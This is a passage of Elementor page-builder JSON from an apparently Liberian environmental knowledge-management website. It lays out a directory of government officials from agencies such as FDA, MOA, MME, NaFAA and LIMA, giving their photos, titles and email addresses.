"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>MOT<br \\/><a 